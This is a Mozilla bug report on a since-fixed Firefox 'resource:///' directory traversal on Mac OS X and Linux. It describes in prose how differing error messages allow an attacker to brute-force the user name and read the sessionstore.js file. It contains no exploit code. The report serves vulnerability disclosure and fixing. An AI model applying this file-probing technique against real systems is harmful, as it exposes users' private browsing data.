Closed Bug 417400 Opened 13 years ago Closed 12 years ago

Resource Directory Traversal Vulnerability - Mac OS X and Linux Example

Categories

(Core :: Security, defect)

PowerPC
macOS
defect
Not set
normal

Tracking

()

RESOLVED FIXED

People

(Reporter: gfleischer+bugzilla, Assigned: dveditz)

Details

(Keywords: verified1.8.1.17, verified1.9.0.2, Whiteboard: [sg:dupe 380994])

Attachments

(1 file)

User-Agent:       Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12
Build Identifier: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12

On Mac OS X and Linux, the "resource:///" directory traversal described in bug 394075 can be used to reach any file on the file system.

Because there is a different error returned for JavaScript for non-existent files versus files that have syntax errors, a brute-force attack could be mounted to determine the OS user name by attempting to source script files from their home directory.

If the operating system user name can be brute-forced (or otherwise determined) and the profile value determined through an information leak, the "sessionstore.js" file can be read if it is stored in the default location.


Reproducible: Always

Steps to Reproduce:
1.
2.
3.
If the OS user name and profile value can be determined, it is possible to read the sessionstore.js file.

Note also that different errors are returned for invalid (or unreachable) user name values compared to users that exist.
This is basically a dupe of bug 380994, customized with a juicy target from flat-chrome traversal bug. Very clever attempt to read the salted profile name. Another way to get that name is sometimes it can be read from uncaught exceptions thrown by addon components (not code in chrome URIs which isn't going to help much, but accompanying javascript XPCOM components which will have file: URIs in the error).
Whiteboard: [sg:dupe 380994]
Assignee: nobody → dveditz
Product: Firefox → Core
QA Contact: firefox → toolkit
Fix for bug 380994 checked into 1.8 and 1.9.0 branches
Status: UNCONFIRMED → NEW
Ever confirmed: true
Verified on latest Mac/Linux build candidates for 20017 and 3.0.2 using test case in comment #1. When running the test case on 20016 and 3.0.1 I could see the contents my sessionstore.js file, on 20017 and 3.0.2 nothing happens.

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.17) Gecko/2008082909 Firefox/2.0.0.17
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.17) Gecko/2008082909 Firefox/2.0.0.17

Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-US; rv:1.9.0.2) Gecko/2008082909 Firefox/3.0.2
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.2) Gecko/2008082909 Firefox/3.0.2
Group: core-security
bug 380994 checked in:
http://hg.mozilla.org/mozilla-central/rev/6dad95d60106
http://hg.mozilla.org/mozilla-central/rev/1eccc541661c
Status: NEW → RESOLVED
Closed: 12 years ago
Resolution: --- → FIXED
You need to log in before you can comment on or make changes to this bug.